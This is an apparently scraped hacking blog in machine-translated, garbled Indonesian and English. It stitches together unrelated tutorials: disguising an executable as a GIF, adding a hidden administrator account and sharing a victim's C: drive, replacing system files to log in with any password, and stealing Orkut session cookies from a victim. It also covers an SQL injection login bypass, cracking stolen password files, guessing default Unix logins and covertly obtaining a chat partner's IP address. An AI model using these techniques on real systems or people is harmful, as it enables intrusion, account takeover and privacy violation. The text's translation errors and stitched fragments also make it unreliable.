buat. file exe ke dalam. manggung file!!
cscript.exe hide.vbs your.gif your.exe
Script menggabungkan "your.gif" dan "your.exe" untuk membuat "your.gif.hta.gif", yang menampilkan dengan benar menggunakan browser IE. Jika 'Sembunyikan ekstensi untuk jenis file yang dikenal' pilihan diaktifkan, yang merupakan setting default, "Save Picture As ..." akan men-download "your.gif", itu benar-benar "your.gif.hta". (Contoh: Klik kanan dan Save Homer)
Microsoft digambarkan HTA seperti yang berjalan seperti file. Exe.
Mengaktifkan Task Manager jika Nonaktifkan!
1. Klik Start -> Run -> Tulis regedit dan tekan pada tombol Enter.
2. Navigasikan ke kunci registri berikut dan kebenaran bahwa pengaturan berikut aktif:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System]
"DisableTaskMgr" = dword: 00000000
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Group Policy Objects \ LocalUser \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System]
"DisableTaskMgr" = dword: 00000000
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ kebijakan \ system \]
"DisableTaskMgr" = dword: 00000000
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon]
"DisableCAD" = dword: 00000000 3. Reboot komputer.
1. Klik Start - Run -> Tulis gpedit.msc dan tekan pada tombol Enter.
2. Arahkan ke User Configuration - Administrative Templates -> System - Ctrl + Alt + Del Option
3. Di sisi kanan layar yang kebenaran Hapus Tugas Manajer mengatur pilihan untuk Nonaktifkan atau Tidak Dikonfigurasi.
4. Tutup gpedit.msc
5. Klik Start - Run -> Tulis gpupdate / force dan tekan pada tombol Enter.
Tips bagaimana memulai Hacking!
cara yang keren untuk menyapa korban
ping [ip korban masuk sini]
jika hasilnya permintaan timed out maka pengguna ofline
jika hasilnya adalah balasan dari [ip] bytes = 32 time <1ms TTL 64
korban yang online.
2) net user [anyname] / add
ia menambahkan net user baru menempatkan setiap inplace nama [anyname]
3) net localgroup administrator [anyname] / add
Ini adalah perintah yang membuat pengguna Anda pergi ke administrator
Tergantung pada versi windows nama akan berbeda.
Jika Anda punya versi amerika nama untuk grup adalah Administrator
dan untuk versi portuguese adalah administradores jadi bagus
yo tahu versi puritan yang windows xp Anda akan mencoba berbagi.
4) sistem berbagi bersih = C: \ / tak terbatas
Ini perintah berbagi drive C: dengan nama sistem.
Anda bisa menggunakan akar setiap dir. malah
5) net use \ \ victimip [nameofnetaccount]
Perintah ini akan membuat sesi antara Anda dan korban
Tentu saja di mana dikatakan victimip Anda akan memasukkan ip korban.
mana nameofnetuser adalah nama melalui mana korban log on
6) explorer \ \ victimip \ system
Dan ini akan membuka windows explorer dalam sistem saham yang ikut
C: drive dengan akses administrator! pertama
Kebutuhan dasar untuk Hacking!
2. Pelajari tentang berbagai jenis perangkat lunak.
3. Pelajari DOS. (Belajar segala sesuatu yang mungkin)
4. Pelajari cara membuat sebuah file batch saja.
5. Scanning port. (Download Blues port scanner jika ini pertama kalinya Anda)
6. Belajar bahasa pemrograman beberapa
HTML, C + +, Python, Perl .... (Saya akan merekomendasikan Anda belajar html sebagai lang pertama)
7. Bagaimana untuk mengamankan diri (proxy, dll ip menyembunyikan)
9. TCP / IP, UDP, DHCP,
10. Dapatkan tangan Anda kotor dengan jaringan
11. Belajar bahasa diassembler (bahasa yang paling dasar untuk memahami bahasa mesin dan sangat berguna untuk ubderstand ketika ada sesuatu yang dibongkar dan diterjemahkan)
12. Pelajari untuk menggunakan os Unix. (Sistem Unix umumnya sarat dengan alat-alat jaringan serta beberapa hacking tools)
13. Pelajari cara menggunakan Eksploitasi dan kompilasi mereka. (Perl dan c + + adalah harus)
1. Dapatkan akses fisik ke mesin. Ingat bahwa ia harus memiliki CD atau DVD drive.
2. Ambil DreamPackPL SINI
3. Unzip dreampackpl.zip download dan Anda akan mendapatkan dreampackpl.ISO.
4. Gunakan program pembakaran yang dapat membakar ISO images.
5. Setelah Anda memiliki disk, boot dari CD atau DVD drive. Anda akan melihat Windows 2000 Setup dan itu akan memuat beberapa file.
6. Tekan "R" untuk menginstal DreamPackPL.
7. Tekan "C" untuk menginstal DreamPackPL dengan menggunakan recovery console.
8. Pilih penginstalan Windows yang saat ini di komputer (Biasanya adalah "1" jika Anda hanya memiliki satu Windows yang diinstal)
9. Cadangan sfcfiles.dll asli Anda dengan mengetikkan:
"Ren C: \ Windows \ System32 \ sfcfiles.dll sfcfiles.lld" (tanpa tanda kutip)
10. Salin file hack dari CD ke folder system32. Jenis:
"Copy D: \ i386 \ pinball.ex_ C: \ Windows \ System32 \ sfcfiles.dll" (tanpa tanda kutip dan dengan asumsi drive CD Anda D :)
11. Ketik "exit", mengambil disk dan reboot.
12. Pada kolom password, ketik "dreamon" (tanpa tanda kutip) dan menu DreamPack akan
13. Klik grafis atas pada menu DreamPack dan Anda akan mendapatkan menu popup.
14. Pergi ke perintah dan memungkinkan pilihan dan memungkinkan perintah tuhan.
Anda juga bisa pergi ke Sandi dan pilih "Logon dengan password yang salah dan hash". Pilihan ini memungkinkan Anda untuk login dengan password APAPUN.
Jika Anda tidak dapat membuka DreamPackPL kemudian Nonaktifkan Anti Virus Anda ..
Klik di sini
2. Ketik megaupload link di textbox mana http:// sudah ditulis.
3. Hapus centang semua pilihan, seperti "Tidak Cookie, No Script, No Images, Sembunyikan Referal, Sembunyikan User Agent, Sembunyikan Judul, Sembunyikan Header"
4. Klik pada tombol "Saya setuju sebuah ingin berselancar secara anonim".
Setelah itu akan ada LIMIT tidak.
Download dari megauload.com:
Berikut adalah tutorial saya untuk di download dari megauload.com tanpa mendapatkan pesan menjengkelkan 300 slot sibuk.
Downlaod agen pengguna AddOn switcher kemudian ikuti instruksi
Klik Install Now untuk menginstal addon.
Restart FireFox. Alat -> User Agent Switcher ---> Pilihan ---> Pilihan
Klik Agen Pengguna ---> Tambah
◘ Description: MEGAUPLOAD
◘ User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Alexa Toolbar)
Klik OK dua kali untuk menyelesaikan menambahkan User Agent.
Mulai sekarang, sebelum men-download file di megaupload hanya pergi Tools -> User Agent Switcher ---> MEGAUPLOAD.
Start/run- >> ketik regedit -> ok
Pergi ke: [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Curr entVersion \ Internet Settings \ 5.0 \ User Agent \ platform Post]
Catatan: jika menggunakan IE 7 U
kunjungi: [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Curr entVersion \ Internet Settings \ User Agent \ platform Post]
Klik kanan pada Platform Posting> New> String Value> ketik Alexa Toolbar> ok
Sekarang U dapat download dari megaupload tanpa kesalahan
kemudian membuat dua account palsu ... u akan perlu satu untuk menerima cookie dan satu untuk mengiklankan naskah Anda sehingga jika orkut mulai menghapus profil seperti real account Anda wont dikompromikan ...
kemudian Heres script
nobody.action = 'Scrapbook.aspx Action.writeScrapBasic?'; nobody.submit ()
u lihat bagian 62915936? thats satu u perlu mengedit untuk mendapatkan cookie ke account Anda ..... CARA PUT NOMOR UR DI BAGIAN ITU??? Ikuti langkah berikut:
pergi ke bagian ALBUM ANDA ... pergi ke foto APAPUN dan klik kanan di atasnya, melihat properti dari gambar tampilan Anda ... u akan melihat sesuatu seperti 12345678.jpg
nobody.action = 'Scrapbook.aspx Action.writeScrapBasic?'; nobody.submit ()
Sekarang beri script ini untuk korban, minta dia untuk pergi ke buku memo nya dan paste script ini di address bar dan tekan enter. sekarang Anda akan mendapatkan cookie di lembar memo Anda ..
sekarang setelah mendapatkan cookie ... pergi ke halaman rumah Anda dan buka plugin cookie editor (TOOLS -> EDITOR COOKIE) ... jenis orkut dalam kotak teks dan klik filter / refresh.look untuk cookie orkut_state. hanya dua kali klik dan mengganti bagian orkut_state dengan korban Anda ...
tidak perlu mengubah bagian _umbz _umbc ...
LAIN SCRIPT: 100% bekerja
menempatkan ur delapan digit angka di tempat (53093255)
Belum semua situs
1. Buka situs yang ingin Anda hack. Menyediakan salah username-password di log-nya dalam bentuk.
(Misalnya: Username: saya dan Password: 'or 1 = 1 -)
Kesalahan akan terjadi mengatakan salah username-password. Sekarang bersiaplah
Percobaan dimulai dari sini ...
2. Klik kanan di manapun pada halaman error = >> pergi untuk melihat sumber.
4. Di sana Anda menemukan agak seperti ini .... <_form action="..login....">
<= .. Masuk ....>
5. Sebelum ini informasi login <= __LOGIN> copy url dari situs di mana Anda berada.
(Misalnya: "<_form..........action=http://www.targetwebsite.com/login.......> <.......... = HTTP : com = ""> ") <.......... = HTTP: com =" ">
7. Kemudian kita melihat dari dekat untuk "<_input type="password"> name="password"" [tanpa tanda kutip] -> ganti "<_type=text>" ada <= TEXT> bukan "<_type=password>" < = TEKS> <=> Lihat di sana jika MaxLength password kurang dari 11 kemudian tingkatkan sampai 11. (misalnya: jika kemudian menulis)
8. Hanya pergi ke file => save as dan simpan dimana saja di hardisk anda dengan ext.html (misalnya: c: \ eg.html)
9. Buka halaman target web Anda dengan mengklik ganda file yang eg.html 'yang telah Anda simpan.
10. U melihat bahwa beberapa perubahan pada halaman saat ini dibandingkan dengan Satu asli. Jangan khawatir.
11. Memberikan nama pengguna [misalnya: hacker] dan password [misalnya: 'or 1 = 1 -]
Congrats!! Anda telah berhasil memecahkan situs di atas dan masuk ke dalam rekening pengguna Ist disimpan dalam database server.
[Silakan baca "_form" = "bentuk" & "_type" = "tipe" & "_input" = "masukan" tanpa tanda kutip]
Trik di atas tidak akan bekerja pada situs menggunakan teknik terbaru untuk melindungi ada server. Tapi Anda bisa menemukan banyak situs!
Contoh situs tersebut adalah Windows Magazine,. Majalah Bersih, Alam, dan banyak, banyak surat kabar di seluruh dunia.
Bagaimana kemudian, dapat Anda menyamarkan diri sebagai Googlebot? Cukup sederhana: dengan mengubah User Agent browser Anda. Salin segmen kode berikut dan paste ke dalam sebuah file notepad segar. Simpan sebagai Useragent.reg dan bergabung ke dalam registri Anda.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Internet Settings \ 5.0 \ User Agent]
@ = "Googlebot/2.1"
"Kompatibel" = "+ http://www.googlebot.com/bot.html"
Anda selalu dapat mengubahnya kembali lagi .... Saya tahu hanya satu situs yang menggunakan User Agent Anda untuk menetapkan eligability Anda untuk menggunakan layanannya, dan itulah situs Windows Update ...
Untuk mengembalikan IE6 User Agent, menyimpan kode berikut untuk NormalAgent.reg dan bergabung dengan registri Anda:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Internet Settings \ 5.0 \ User Agent]
@ = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
2. Ketik alamat website ada setelah memilih bahasa.
3. Kemudian tekan Enter.
4. Anda sekarang melihat situs web secara anonim.
5. Administrator Situs web tidak tahu Alamat IP Anda. Dia melihat Alamat IP dari beberapa bagian dari dunia.
Coba mengetik target_com / gambar. (Hampir setiap situs web memiliki direktori gambar) Ini akan menempatkan Anda ke dalam direktori gambar, dan memberikan daftar teks semua gambar berlokasi di sana. Seringkali, judul gambar akan memberikan petunjuk kepada nama direktori lain.
yaitu: di www.target.com / gambar, ada gif bernama gamestitle.gif.. Ada kesempatan baik itu, bahwa ada direktori 'permainan' di situs, sehingga Anda kemudian akan ketik www.target.com / permainan, dan jika direktori isa valid, Anda lagi mendapatkan daftar teks dari semua file tersedia di sana.
Untuk pendekatan yang lebih otomatis, menggunakan program seperti WEB SNAKE dari anawave, atau Wacker Web. Program ini akan menciptakan citra cermin dari seluruh situs web, menampilkan semua direktur ies, atau bahkan cermin server yang lengkap. Mereka sangat diperlukan untuk mencari file tersembunyi dan directories.What yang Anda lakukan jika Anda tidak bisa melewati sebuah kotak pembukaan "PasswordRequired"? . Pertama apakah sebuah WHOIS Lookup untuk situs. Dalam contoh kita, www.target.com. Kami menemukan itu diselenggarakan oleh www.host.com di 100.100.100. 1.
Kami kemudian pergi ke 100.100.100.1, dan kemudian memulai Ular Web, dan mencerminkan seluruh server. Set Ular Web untuk TIDAK men-download sesuatu selama sekitar 20K. (Bukan halaman HTML banyak yang lebih besar dari ini) ini hal kecepatan beberapa, dan membuat Anda mendapatkan banyak file dan gambar yang tidak peduli. Hal ini dapat memakan waktu yang lama, jadi pertimbangkan berjalan dengan benar sebelum waktu tidur. Setelah Anda memiliki gambar dari seluruh server, Anda melihat melalui direktori yang tercantum, dan menemukan / target. Ketika kita membuka direktori tersebut, kita menemukan isinya, dan semua sub-direktori yang terdaftar. Katakanlah kita menemukan / target / permainan / zip / zipindex.html. Ini akan menjadi halaman indeks yang akan ditampilkan telah Anda pergi melalui prosedur password, dan memungkinkan untuk mengarahkan Anda here.By hanya mengetik di url target_index Anda akan halaman indeks onthe dan siap untuk mengikuti link untuk men-download.
Bahaya'' ctrl + c'' di web!
1) Salin teks dengan 'ctrl + c'
2) Klik Link: http://www.sourcecodesworld.com/special/clipboard.asp
Anda akan melihat teks yang disalin pada Layar yang diakses oleh halaman web ini. (Check it out!!)
Jangan menyimpan data sensitif (seperti password, nomor reditcard, PIN dll) dalam clipboard saat berselancar web. Hal ini sangat mudah untuk mengekstrak teks yang tersimpan dalam clipboard untuk mencuri informasi sensitif Anda.
Untuk menghindari Soal Clipboard Hack, lakukan hal berikut:
1. Di Internet Explorer, Klik Tools -> Internet options -> Keamanan
2. Tekan Custom level.
3. Pada pengaturan keamanan, pilih menonaktifkan bawah Biarkan pasta operasi melalui script dan klik 'OK. (Sekarang isi clipboard Anda aman.)
Menghapus entri dari daftar.
Cara lain untuk mengakses dialog ini adalah:
Ketik control userpasswords2 di dalam kotak RUN, klik Advanced, Mengelola Sandi
Dari Control Panel, pilih User Account Anda, klik Kelola password jaringan Anda
Ini adalah tutorial singkat yang dirancang untuk menunjukkan Anda bagaimana untuk memulai dengan
hacking. Ini bukan analisis mendalam dalam Unix dan saya tidak akan menunjukkan cara
to hack specific systems or give you any specific usernames or passwords.
Anything that you do after reading this file is NOT my responsibility, so
don't expect me to write to you in jail if you get caught. If you are an
advanced hacker, then I suggest you give this a miss as it's designed for
Section 1 : What exactly is a hacker then?
Tricky one really. There are hundreds of definitions floating around, but
the basic description of a hacker would be someone who accesses and uses a
computer system in ways which a normal user might not think of. Hal ini mungkin
legal, but chances are that it will be illegal. Also, many hackers might not
consider you to be one of them unless you have the hacker attitude.
Basically what this means is that you have a certain view over the way in
which things should be done. For example, nearly all hackers are anti
authoritarian. Another thing which you really should do is give voluntry
help to other hackers. This may be in the form of debugging programs that
they have written, informing them of new bugs in systems etc... Ada
plenty of detailed FAQ's out there, so I won't go into it in detail. Mencoba
looking up 'hacker ethics' in any descent search engine (www.altavista.com
is pretty good) for more
Section 2 : Tell me how to hack!
Ya benar. You ask any hacker or newsgroup this and your gonna get flamed.
Flaming is when someone responds to your question by throwing a string of
anger and obsenities at you because they are mad. Mengapa mereka melakukan ini?
After all hacking is about giving voluntry help isn't it? Well, asking how
to hack is not only far too general, but it's also pointless. Nobody can
tell you how to hack. They can give you passwords, programs and bugs, but
they by doing this they would be stopping you from learning and discovering
new things, and let's face it, the best way to learn to hack is to do it.
Section 3 : Where to learn
Apart from actually hacking, the most important thing you can do is read.
Texts can come from a variety of sources, including your local library and
of coarse the internet. There are some around with titles like 'The secret
underworld of hacking' but these are mostly a waste of time, and contain no
valuable information. Instead, read books with titles like : 'Unix : An
introduction' or 'How to teach yourself Unix'. These will contain a wealth
of commands and information. You will not learn by simply downloading
programs to do your work for you, although some are essential (I'll tell you
which ones later).
Section 4 : The art of hacking
Hacking is in many ways an art. It takes time, patience and intelligence.
You won't get immediate gratification, but if you do get good, then it's
really worth it. There are several skills accosiated with hacking, but the
fundemental one, which is often overlooked by newbies is the ability to
program. Programming is basically telling the computer what to do, and a
programming language is the way in which you write it. Again, there are
millions of tutorials to do with this subject, and it is FAR too big to go
into here. The basic languages you will need to know are perl and c, which
are the main languages for the Unix operating system (I'll go onto that in a
second). Again, any good search engine will give you hundreds of sites
realted to these. Just to give you an idea of what programming is about,
here' some c source code (that's the text before it is compiled/interpreted
so the computer can understand it):
using namespace std;
cout<<'Hi there, how are you!';
Note that this section of code is taken from a MSDOS application. Unix will
differ slightly. Although it can be a bit tedious, programming is very
rewarding, and is very important if you want to become a good hacker. Anda
won't need to become some programming genius to hack though, just have a
general idea of the syntax used by the languages. The next important skill
you need to learn is how to use the Unix operating system. Ini adalah
operating system (like windows or DOS) which is specifically designed for
networking. Most big servers use it and it allows thousands of users to
connect to virtual (software) and hardware ports remotely ( if the computer
it is operating has them). Like programming, Unix is very complicated and
detailed, so I can only give you an introduction here. Cara terbaik untuk mengajar
you what Unix is is to give you an example. This example assumes that the
person using it has a shell account (a user name and password so that he can
log in and use the computers), and that the user has windows on their
komputer. It is entirely fictional:
(In the run bar)
telnet shinracorperation.com 23
(Telnet starts up, there's a brief pause before the cursor starts flashing)
SunOS : 5.10
Welcome to the shinra corperations main server. Type 'help' for more.
That is an example of a typical Unix system. To operate it, we run telnet
(the standard telnet program included with windows), this will allow our
computer to communicate with the remote server which is
shinracorperation.com. The number 23 after it tells telnet to connect to
port 23 on the computer. Ports allow remote users to input commands to the
komputer. A computer can have thousands of ports, each with a different
number, but the most common and what they do are:
13 : Date and time port (pretty useless really)
21 : FTP (File transport Protocal) port
23 : Standard telnet port. This is the port which the telnet program will
try to open by default
25 : Send Mail port. This allows the user to operate an ancient send mail
program which can send messages to email addresses on that server (more
79 : The 'finger' port. This allows the user to type in the name of a user
and get details on them (very useful)
80 : Standard http port (it's the one your browser opens)
110 : POP port. Allows you to operate a primitive POP email program.
To connect to each of these ports you would put the number instead of 23 in
baris perintah. The next line tells us what type of operating system the
computer is using. This will become important if you need to use a bug or
back door to get into the system, as they vary from operating system to
operating system. One advantage of Unix operating systems is that they don't
record your login attemps, so the sysadmin won't find 6000 attempts in his
log file when he has a look. Now, the only thing holding us back here is the
need for a username and password. In the early days of hacking, you could
telnet to any computer, type in root as your username and root as your
password and you'd be in with superuser privialges (root is the username
that should give you the ability to do anything on that computer). Bahwa
ain't gonna happen these days. There are some servers which you might be
lucky enough to guess a username and password on, so have a look at the list
below of common Unix users:
guest (VERY often the password will be guest too)
Although unlikely, these may work if you enter the password the same as the
username, it's worth a try. I hope that gave you an idea of what Unix is.
The final part, by the way, was the command prompt, similair to the C:\>
prompt in DOS. Here you would enter commands for the computer. Since this is
only an introduction, I won't go into commands here, but there are plenty of
books, many from your local library which will tell you how to use Unix. Anda
can find more information on how to exploit bugs in Unix operating systems
and backdoors in them by using a search engine. Chances are that you will
not be able to guess the password. In this case you'll need to do some
penelitian. Try looking at the companies web site, and finding out things
Section 5 : Toolz
Although you should use them as little as possible, you will need to use
some programs. One of the most essential is a password cracking program. Di
most Unix systems, the password file is located in /etc/passwd. As I've
said, there are plenty of files which will tell you how to download it, so I
won't go into that here. Now, assuming you've got the password file, you'll
need a program called John the Ripper deencrypt the file and get the
passwords. If you open the passwd file with a standard editor like notepad
or edit, you will see something like:
With many more lines added on. If it looks like the first one, then not only
are you lucky, but you've got the passwords for the entire system. Sekarang jalankan
Jack the ripper on it, and if your dictionary file (a file with lots of
standard passwords in it) is good enough, you should at least get a few of
the passwords. If you get root, then get very, very excited. You can now log
into the system and do anything. BUT be warned, you do ANY damage what so
ever, and they'll find you within a couple of hours, so DON'T. Tidak hanya
that, but it'll make you a cracker which is someone who breaks into a system
to do damage to it, they are looked down upon by real hackers. Now, if it
looks more like the second one, get ready to cry 'cos the password file is
shadowed. This means that although the users are stored in the passwd file,
the passwords are stored in different one, usually /etc/shadow. Ini
obviously means that you must download the shadow file (the server probably
won't let you), merge it with the passswd file, and then run john the ripper
on it. If you can get both the passwd and shadow files, you'll need to get a
program called VCU to merge them, although there are some others around.
Shadowing is used by most servers these days, and makes life a hell of a lot
Section 6 : Using programs on the server
The first program I'm gonna look at is SMTP (send mail) which is usually
stored on port 25. I'm not gonna give any direct examples here, but replace
the xxx part with virtually any server name and you should find one:
telnet xxx 25
SMPT Version 1.3 Ready
And that is all you get. You are now ready to run this program. It allows
you to send mail to anyone who has an email address within that server. Itu
commands that you'll need to know to use this program are
help - gives you a list of commands. If you follow it with a command, it
will give you help on it
helo - This tells the computer who you are
mail from:xxx - It will say who the mail is from on the message (replace xx
with a made up or real email address)
rcpt to: - Who the mail will go to. It must be within the server that you
are hacking or you will get the error 'Relaying not allowed'
data : Press enter, and type in what you want the message to say. Put a full
stop (a period) and a seperate line and press enter to end and send the
quit : Disconnects you
vrfy xxx : Replace the xxx with a user name, and it will tell you if it
This should give you a basic idea of how to use the program. The commands
should come in that order to send mail (vrfy is not needed to send mail, you
can simply use it to tell if a user exists. Oh yeah, and you won't see what
you type in.
The other program I'm gonna look at is in port 79 so type:
telnet xxx 79
You will be greeted by, well nothing. Loads of servers have closed this
port, but if they have it open, then it is very useful. All you do is type
in the name of the user you want to finger, and it will give you their
account details. Try all of the common users above. This program will
usually only let you finger one user before disconnecting.
I hope this has been an informative introduction into the world of hacking.
Even at this level, there are tonnes more things which you will need to find
out about so that you can hack. I suggest you look the following things up
in your search engine:
Unix operatins system
Hopefully you will find what you need. One last word of warning, be VERY
careful about hacking, and don't do any damage, you WILL get caught if you
melakukan. Oh yeah, and have fun...
You may reproduce this document on any web page or on any CDROM or
sebaliknya. You do not have to ask my permission or anything, as long as it
remains unchanged and I get the credit. As I've already said, I'm not
responsible if you act on the information above, and this was intended for
EDUCATIONAL PURPOSES ONLY.
Metode Tentu Cracking Setiap e-mail Sandi!
Most hackers does not really hacking passwords by penetrating Yahoo, Hotmail, Gmail, and AOL servers, instead they will go for the easy way - the end user, that's you. It's not what you see on the movies such like "Hackers," "SwordFish," and so on. Too good to be true! They don't actually hack, but logs every stroke on your keyboard including the passwords you have input.
Keep in mind that computer surveillance Programs should be used only if necessary, it was not created to invade someone's privacy. If you are going to use it, be a responsible user.
Thursday, November 15, 2007
Cara Hack (Tips Dasar Untuk Mulai Hacking)!
what they do to Hack?
These are the common enough question, asked on nearly every hacking board across the web, and yet, no one seems to be able to answer it.
One reason for this is the fact that the vast majority of people who really don't have, want, or need a clue. Then there's a small minority who have a good basic knowledge but simply not enough conviction to teach. Then there's the tiny minority who really know the ins and outs of computer systems, they can program exploits, bug fixes, and can generally fix, or find out how to fix nearly any problem. These are the people referred to as computer experts. An even smaller percentage of people again are called hackers. Hacker is a term that over recent time has been changed and exploited by the media to mean someone who breaks into and destroys a computer system. I don't like these people. These are the people who give true hackers a bad name. By dictionary definition, a hacker is someone who has an extraordinary ability to push a computer system, or program, to work beyond expected boundaries, "He hacked away at the program all night until he got it to work " . A Hacker, in the true meaning should be respected, the modern interpretation, someone who breaks systems is traditionally known as a cracker
The biggest reason for someone to truly want to become a hacker is to learn. There's no bigger reason than this. The simple craving to learn about, change, understand and improve a computer system and/or program is the single biggest goal for any hacker. Maybe the second biggest reason behind hacking is freedom. To understand this you must fist understand what I talked about in the previous paragraph, that hacking is not breaking systems, but improving them. Any one who considers themselves half knowledgeable about the Internet should have heard of Gnu/Linux. If you haven't please refer to http://www.linux.org/info/index.html. Linux and the GNU project embody the spirit of what I consider to be a true hacker goal. The ideas of freedom, improvement and development should be at the heart of every hacker's life. The Internet itself is another representation of this ideal. There is no one owner of the Internet; anyone can access it for no costs other than that of a phone call. The Internet is the single biggest source of information the world has ever seen. It contains information on billions of subjects, the vast majority of which is absolutely free. A person with a connection to the Internet can access information on everything from quantum computing to the exploration of mars, from pro-anarchy to pro-capitalist. It allows all this information to be accessible to everyone with no discrimination on the basis of age, colour, religious or political orientation. That's enough of a rant on freedom now. I'm sure most people are reading this to find out what it takes to become a hacker.
A hacker, as I have previously explained, is a person who has a craving for knowledge. If you don't have the will to learn continuously, spend countless hours reading, researching and improving then hacking defiantly isn't for you. Many people will give up after a few months, many I'm sure didn't even make it to this far into the document, if you did then well done, keep reading, in time, you will learn to truly enjoy hacking away at your own programs and helping others too. I am by no means a hacker; neither do I claim to be. However, I have been reading, learning and sometimes even contributing for quite a while now, and hopefully this document will allow you to do the same. Cukup bicara. This is where you start to learn.
As by now you will know, the main aim of hacking is knowledge. Before you can even hope to understand how to improve software you must fist understand how the current software works. Since most newbies (Newbie n. Someone who has little knowledge or experience with computer systems and/or programs) I assuming will be using a version of the Windows OS (OS - Operating System) Since you wish to learn how to hack I am assuming you have quite a strong grasp of the basics or Windows such as how to run programs, navigate your hard disk, install new software, hardware etc. If you do not know how to do this use the built in help function by clicking Start -> Help, or use your favourite search engine, I suggest google.com as it's probably the largest in the world. Learn how to use everything about your OS, including MS-DOS. To open a MS-DOS prompt, or shell Click on Start -> Programs -> MS-DOS Prompt , if this fails or the link isn't there for some unknown reason click Start -> Run and then type 'command.com'. This will run the program command.com, which is located in the c:\ directory of your hard disk. There are various programs that can be run from the dos prompt, which are very useful in basic hacking techniques.
Intro to MS-DOS
MS-DOS is a command line OS which is the basis for most windows OS's. It has many internal commands such as copy, cd, cls, ren, del. And several external commands including sys, move, format, deltree, syscopy. Internal commands are commands which are built into the command.com program and so can be run in any MS-DOS with no dependencies, External commands are commands which are not built into command.com, they are external programs which are usually found in c:\windows\command but can be found anywhere. In DOS, to find out what a command does you can type 'command /?' at a dos prompt where command is the name of the command you wish to learn about. This is invaluable and if you ever need to find out what a command does, this is the first thing you should try. Next I am going to explain some basic MS-DOS commands which will be useful during your exploration of the web.
Usage: ping [-options] hostname.domain
Pinging yahoo.com [18.104.22.168] with 32 bytes of data:
Reply from 22.214.171.124: bytes=32 time=306ms TTL=45
Reply from 126.96.36.199: bytes=32 time=430ms TTL=45
Reply from 188.8.131.52: bytes=32 time=295ms TTL=45
Reply from 184.108.40.206: bytes=32 time=340ms TTL=45
Ping statistics for 220.127.116.11:
Paket: Terkirim = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 295ms, Maximum = 430ms, Average = 342ms
Ping sends a ping request to a domain name to test its reactivity and response times. It does this by sending a packet of information to the server in question and requests a response. The output, as you can see is tells you the domain name that is being pinged, its IP address, the size of packets sent out, the response times, and averages. Ping is a very useful command as it tells you the IP address of a domain name, and tells you if it is 'alive' and responsive. The uses of this will become apparent later on. To find out extra options that can be used with ping, type 'ping /?' at the dos prompt.
Usage: netstat [-options]
Proto Local Address Foreign Address State
TCP pbn-computer:1067 w3.dcx.yahoo.com:80 ESTABLISHED
TCP pbn-computer:1069 18.104.22.168:80 ESTABLISHED
TCP pbn-computer:1070 22.214.171.124:80 ESTABLISHED
TCP pbn-computer:1071 126.96.36.199:80 ESTABLISHED
Netstat gives a list of all connections coming to and from your computer. It displays the ports (A virtual port of a computer is like an imaginary route for information to come in and out of your computer (to the internet) All services and programs which use the internet use a different port to ensure that information does not get sent to the wrong program) and IP's of both ends of the connections. There are thousands of available ports, not something you run out of. Once again, typing 'traceroute /?' at the dos prompt to get more information. Netstat can also be used as a crude method of getting a person's IP. To do this you do the following, for the sake of simplicity you should try to minimise the number of connections, this can be done by closing internet browsers, chat programs etc. Firstly, you will need to talk to the person on a chat program such as msn messenger, aim, yahoo messenger or something similar. At the dos prompt type 'netstat > temp1.txt' this will give the standard output, but the output will be routed into the file temp.txt (which if does not exist, will be created, and if does exist will be over written). Next you will need to establish a direct connection with the target computer, this can be done by initiating a file transfer. Whilst the file transfer is talking place you will need to once again type 'netstat >temp2.txt'. The next task is to compare the two files (temp1.txt and temp2.txt), the second file should contain an IP address that is not in the first, this new connection is the connection you initiated o the target computer, hence the IP address is the IP of your target.
Usage: tracert [-options] IP
Tracing route to yahoo.com [188.8.131.52]
over a maximum of 30 hops:
1 * * * Request timed out.
2 175 ms 180 ms 180 ms cdf-dam1-a-fa11.inet.ntl.com [184.108.40.206]
3 185 ms 200 ms 200 ms 220.127.116.11
4 180 ms 170 ms 190 ms bir-bb-a-so-220-0.inet.ntl.com [18.104.22.168]
5 165 ms 180 ms 180 ms bir-bb-b-ge-720-0.inet.ntl.com [22.214.171.124]
6 320 ms 360 ms 320 ms yahoo-above-1.pao1.above.net [126.96.36.199]
7 400 ms 340 ms 339 ms ge-1-3-0.msr2.pao.yahoo.com [188.8.131.52]
8 315 ms 355 ms 345 ms vl11.bas2.scd.yahoo.com [184.108.40.206]
9 420 ms 320 ms 340 ms yahoo.com [220.127.116.11]
Tracert short for trace route does exactly that, it traces the route taken by individual packets of information as they are transmitted across the Internet to the destination. The uses of this are numerous and will become clear as you learn more. In its simplest form it can be crudely used to find out a persons ISP and even locate them on a international level. For example, is you tracert a persons ISP, and the final hop before reaching them is m284-mp1-cvx1c.car.ntl.com [18.104.22.168] , we know that the person uses ntl as an ISP, on further investigation it can be found that ntl is a UK based ISP and the abbreviation .car. stands for Cardiff, a city in the UK. From this we know that the person in question uses ntl and lives in the vicinity of Cardiff. Encase any one out their is wondering, I do live in Cardiff, UK and the IP address is mine, its a dynamic IP address (dynamic means it changes every time I connect to the internet as oppose to static which means the connection is constant and IP does not change). Use 'tracert /?' Untuk informasi lebih lanjut.
Ok, so they are three basic, and surprisingly simple yet useful commands to give you a basic understanding of DOS. If you want to learn more then I suggest you search the internet, http://www.google.com is, as far as I know, the biggest search engine on the web and along with the most simple of knowledge should allow you to find anything about anything.
